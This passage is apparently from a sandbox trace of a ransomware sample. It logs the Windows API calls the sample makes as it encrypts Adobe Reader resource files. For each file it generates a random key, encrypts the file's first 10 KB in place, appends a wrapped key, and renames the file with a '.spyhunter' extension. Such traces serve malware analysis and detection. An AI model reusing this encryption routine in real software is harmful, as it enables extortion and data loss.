10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt.spyhunter")) returned 1 [0180.186] GetProcessHeap () returned 0x2c0000 [0180.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.186] GetProcessHeap () returned 0x2c0000 [0180.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.186] GetProcessHeap () returned 0x2c0000 [0180.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2668 | out: hHeap=0x2c0000) returned 1 [0180.186] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3c0 | out: pbBuffer=0x270e3c0) returned 1 [0180.186] GetProcessHeap () returned 0x2c0000 [0180.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.186] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3b8*=0x30) returned 1 [0180.186] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.187] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT") returned 97 [0180.187] StrStrW (lpFirst="HEBREW.TXT", lpSrch=".txt") returned 0x0 [0180.187] GetProcessHeap () returned 0x2c0000 [0180.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.187] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e37c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e37c*=0x2800, lpOverlapped=0x0) returned 1 [0180.188] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.188] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e37c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e37c*=0x2800, lpOverlapped=0x0) returned 1 [0180.189] GetProcessHeap () returned 0x2c0000 [0180.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.189] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.189] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e37c, lpOverlapped=0x0 | out: lpBuffer=0x270e3bc*, lpNumberOfBytesWritten=0x270e37c*=0x4, lpOverlapped=0x0) returned 1 [0180.189] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e37c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e37c*=0x30, lpOverlapped=0x0) returned 1 [0180.189] CloseHandle (hObject=0x9c) returned 1 [0180.190] GetProcessHeap () returned 0x2c0000 [0180.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.190] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT.spyhunter") returned 107 [0180.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt.spyhunter")) returned 1 [0180.190] GetProcessHeap () returned 0x2c0000 [0180.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.190] GetProcessHeap () returned 0x2c0000 [0180.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.190] GetProcessHeap () returned 0x2c0000 [0180.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2550 | out: hHeap=0x2c0000) returned 1 [0180.191] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3c0 | out: pbBuffer=0x270e3c0) returned 1 [0180.191] GetProcessHeap () returned 0x2c0000 [0180.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.191] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3b8*=0x30) returned 1 [0180.191] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.191] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT") returned 96 [0180.191] StrStrW (lpFirst="GREEK.TXT", lpSrch=".txt") returned 0x0 [0180.191] GetProcessHeap () returned 0x2c0000 [0180.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.191] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e37c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e37c*=0x2800, lpOverlapped=0x0) returned 1 [0180.193] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.193] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e37c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e37c*=0x2800, lpOverlapped=0x0) returned 1 [0180.193] GetProcessHeap () returned 0x2c0000 [0180.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.193] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.193] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e37c, lpOverlapped=0x0 | out: lpBuffer=0x270e3bc*, lpNumberOfBytesWritten=0x270e37c*=0x4, lpOverlapped=0x0) returned 1 [0180.194] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e37c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e37c*=0x30, lpOverlapped=0x0) returned 1 [0180.194] CloseHandle (hObject=0x9c) returned 1 [0180.194] GetProcessHeap () returned 0x2c0000 [0180.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.194] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT.spyhunter") returned 106 [0180.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt.spyhunter")) returned 1 [0180.195] GetProcessHeap () returned 0x2c0000 [0180.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.195] GetProcessHeap () returned 0x2c0000 [0180.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.195] GetProcessHeap () returned 0x2c0000 [0180.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2438 | out: hHeap=0x2c0000) returned 1 [0180.195] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3b8 | out: pbBuffer=0x270e3b8) returned 1 [0180.195] GetProcessHeap () returned 0x2c0000 [0180.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.195] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3b0*=0x30) returned 1 [0180.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.196] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT") returned 96 [0180.196] StrStrW (lpFirst="FARSI.TXT", lpSrch=".txt") returned 0x0 [0180.196] GetProcessHeap () returned 0x2c0000 [0180.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.196] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e374*=0x2800, lpOverlapped=0x0) returned 1 [0180.197] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.197] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e374*=0x2800, lpOverlapped=0x0) returned 1 [0180.198] GetProcessHeap () returned 0x2c0000 [0180.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.198] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.198] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e374, lpOverlapped=0x0 | out: lpBuffer=0x270e3b4*, lpNumberOfBytesWritten=0x270e374*=0x4, lpOverlapped=0x0) returned 1 [0180.198] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e374, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e374*=0x30, lpOverlapped=0x0) returned 1 [0180.198] CloseHandle (hObject=0x9c) returned 1 [0180.199] GetProcessHeap () returned 0x2c0000 [0180.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.199] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT.spyhunter") returned 106 [0180.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt.spyhunter")) returned 1 [0180.200] GetProcessHeap () returned 0x2c0000 [0180.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.200] GetProcessHeap () returned 0x2c0000 [0180.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.200] GetProcessHeap () returned 0x2c0000 [0180.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2320 | out: hHeap=0x2c0000) returned 1 [0180.200] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3b8 | out: pbBuffer=0x270e3b8) returned 1 [0180.200] GetProcessHeap () returned 0x2c0000 [0180.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.200] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3b0*=0x30) returned 1 [0180.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.201] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT") returned 99 [0180.201] StrStrW (lpFirst="CYRILLIC.TXT", lpSrch=".txt") returned 0x0 [0180.201] GetProcessHeap () returned 0x2c0000 [0180.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.201] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e374*=0x2800, lpOverlapped=0x0) returned 1 [0180.202] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.202] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e374*=0x2800, lpOverlapped=0x0) returned 1 [0180.202] GetProcessHeap () returned 0x2c0000 [0180.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.203] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.203] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e374, lpOverlapped=0x0 | out: lpBuffer=0x270e3b4*, lpNumberOfBytesWritten=0x270e374*=0x4, lpOverlapped=0x0) returned 1 [0180.203] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e374, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e374*=0x30, lpOverlapped=0x0) returned 1 [0180.203] CloseHandle (hObject=0x9c) returned 1 [0180.204] GetProcessHeap () returned 0x2c0000 [0180.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.204] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT.spyhunter") returned 109 [0180.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt.spyhunter")) returned 1 [0180.205] GetProcessHeap () returned 0x2c0000 [0180.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.205] GetProcessHeap () returned 0x2c0000 [0180.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.205] GetProcessHeap () returned 0x2c0000 [0180.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2208 | out: hHeap=0x2c0000) returned 1 [0180.205] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3b0 | out: pbBuffer=0x270e3b0) returned 1 [0180.205] GetProcessHeap () returned 0x2c0000 [0180.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.205] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3a8*=0x30) returned 1 [0180.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.206] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT") returned 99 [0180.206] StrStrW (lpFirst="CROATIAN.TXT", lpSrch=".txt") returned 0x0 [0180.206] GetProcessHeap () returned 0x2c0000 [0180.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.206] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e36c*=0x2800, lpOverlapped=0x0) returned 1 [0180.207] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.207] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e36c*=0x2800, lpOverlapped=0x0) returned 1 [0180.208] GetProcessHeap () returned 0x2c0000 [0180.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.208] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.208] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e36c, lpOverlapped=0x0 | out: lpBuffer=0x270e3ac*, lpNumberOfBytesWritten=0x270e36c*=0x4, lpOverlapped=0x0) returned 1 [0180.209] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e36c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e36c*=0x30, lpOverlapped=0x0) returned 1 [0180.209] CloseHandle (hObject=0x9c) returned 1 [0180.209] GetProcessHeap () returned 0x2c0000 [0180.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.209] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT.spyhunter") returned 109 [0180.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt.spyhunter")) returned 1 [0180.210] GetProcessHeap () returned 0x2c0000 [0180.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.210] GetProcessHeap () returned 0x2c0000 [0180.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0180.210] GetProcessHeap () returned 0x2c0000 [0180.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee20f0 | out: hHeap=0x2c0000) returned 1 [0180.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3b0 | out: pbBuffer=0x270e3b0) returned 1 [0180.211] GetProcessHeap () returned 0x2c0000 [0180.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0180.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3a8*=0x30) returned 1 [0180.211] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0180.211] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT") returned 99 [0180.211] StrStrW (lpFirst="CORPCHAR.TXT", lpSrch=".txt") returned 0x0 [0180.212] GetProcessHeap () returned 0x2c0000 [0180.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0180.212] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e36c*=0x2800, lpOverlapped=0x0) returned 1 [0180.213] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.213] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e36c*=0x2800, lpOverlapped=0x0) returned 1 [0180.213] GetProcessHeap () returned 0x2c0000 [0180.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.213] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.214] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e36c, lpOverlapped=0x0 | out: lpBuffer=0x270e3ac*, lpNumberOfBytesWritten=0x270e36c*=0x4, lpOverlapped=0x0) returned 1 [0180.214] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e36c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e36c*=0x30, lpOverlapped=0x0) returned 1 [0180.215] CloseHandle (hObject=0x9c) returned 1 [0180.215] GetProcessHeap () returned 0x2c0000 [0180.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.215] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT.spyhunter") returned 109 [0180.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files 